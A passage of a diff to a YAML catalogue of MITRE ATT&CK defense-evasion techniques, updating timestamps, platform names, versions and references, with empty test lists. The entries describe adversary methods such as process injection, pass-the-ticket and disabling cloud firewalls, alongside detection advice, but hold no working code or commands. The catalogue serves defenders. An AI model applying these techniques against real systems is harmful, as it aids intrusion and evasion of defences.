       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6276,12 +6406,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -6313,11 +6442,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -6358,11 +6486,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -6418,12 +6545,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6480,7 +6606,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -6516,7 +6641,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6549,13 +6674,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6617,10 +6740,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -6678,7 +6800,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -6720,7 +6841,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -6779,41 +6900,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6822,20 +6912,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -6865,7 +6985,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6900,8 +7020,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -6992,12 +7110,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -7005,19 +7122,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -7026,7 +7149,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -7049,9 +7172,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -7084,7 +7206,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -7103,8 +7225,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -7135,7 +7255,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7165,12 +7285,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7196,9 +7314,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -7229,14 +7346,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7256,6 +7372,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -7263,7 +7380,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -7279,34 +7395,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -7372,7 +7489,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -7411,7 +7527,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -7460,8 +7576,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -7512,7 +7626,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7533,7 +7647,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -7600,7 +7713,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -7623,7 +7735,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7644,8 +7756,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -7706,11 +7816,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -7775,7 +7884,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -7799,7 +7907,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7843,8 +7951,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -7900,7 +8006,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7924,7 +8030,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -8015,40 +8120,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -8060,6 +8136,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -8070,8 +8150,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -8081,9 +8167,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
